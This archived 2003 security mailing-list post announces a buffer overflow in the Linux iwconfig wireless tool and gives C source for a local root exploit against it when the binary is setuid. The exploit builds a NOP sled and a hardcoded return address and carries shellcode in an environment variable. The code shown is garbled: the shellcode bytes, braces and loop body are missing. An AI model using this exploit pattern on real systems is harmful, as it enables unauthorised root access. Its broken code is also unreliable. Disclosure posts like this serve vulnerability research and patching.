lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 13 Nov 2003 01:25:39 +0200
From: "hekuran doli" <>
Subject: iwconfig vulnerability - the last code was demaged sending by email

iwconfig is a tool that manipulate the basic wireless parameters, allowing 
privilege escalation due to buffer overflow vulnerability. The iwconfig is 
not setuid by default, but I have seen in several places it was. The flowing 
exploit has been released to test your servers. 

  Name: iw-config.c
  Copyright: !sh2k+!tc2k
  Author: heka
  Date: 11/11/2003
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, 
dunric, termid, kewlcat, JiNKS
  Description: /sbin/iwconfig - local root exploit
  iwconfig manipulate the basic wireless parameters 

#include <stdio.h>

#define BIN     "/sbin/iwconfig"

unsigned char shellcode[] =

main ()
   int x;
   char buf[97], out[1337], *buffer;
   unsigned long ret_add = 0xbffffbb8, *add_ptr ;
   buffer = buf;
   add_ptr = (long *)buffer;
   for (x=0; x<97-1; x+=4)
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen(shellcode));
   memcpy((char *)out, "OUT=", 4);
   execl (BIN, BIN, buf, NULL);
   return 0;


Open WebMail Project (

Powered by blists - more mailing lists